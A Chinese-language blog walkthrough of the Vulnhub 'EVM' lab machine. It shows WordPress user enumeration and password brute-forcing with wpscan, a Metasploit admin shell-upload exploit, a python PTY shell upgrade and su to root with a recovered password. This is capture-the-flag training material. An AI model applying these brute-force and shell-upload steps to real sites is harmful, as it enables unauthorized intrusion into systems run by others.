Vulnhub -> EVM

一、测试环境

EVM、Mac、kali

VM名称:EVM
下载(镜像):https://www.vulnhub.com/entry/evm-1,391
描述:这是超级友好的盒子

靶机EVM

二、渗透过程

扫描靶机

信息收集

看到靶机有80端口然后先访问一下

看到了一个WordPress框架提醒~

让我们使用wpscan工具扫描这个框架

wpscan --url http://192.168.43.239/wordpress -e ap -e at -e u

这里扫到了一个用户名c0rrupt3d_brain接着继续使用工具爆破密码。

wpscan --url http://192.168.43.239/wordpress -U c0rrupt3d_brain -P /Users/harvey/Documents/IT/Sec/rockyou.txt

rockyou.txt这个字典在kali的/usr/share/wordlists/rockyou.txt

我们看到他的密码为24992499

接下来我们可以使用Metasploit的内置wordpress漏洞。

首先,通过键入“ msfconsole”启动Metasploit,然后键入以下命令:

msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set RhOSTS 192.168.43.239
 set USERNAME c0rrupt3d_brain
 set PassWORD 24992499
set targeturi /wordpress
run

看到这就已经成功了~

先进入home目录下,看到有一个root3r的目录,继续进去,看到了一个.root_password.ssh.txt的文件我们查看一下。

我们知道了root用户的密码好我们提权。我们先建立交互式~

shell
python -c 'import pty;pty.spawn("/bin/bash")'
su root
willy26
从python命令提示符到交互式shell:import pty pty.spawn(“/bin/bash”)

进入root目录下,发现了一个proof.txt,打开看看~

成功拿到靶机的flag~

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇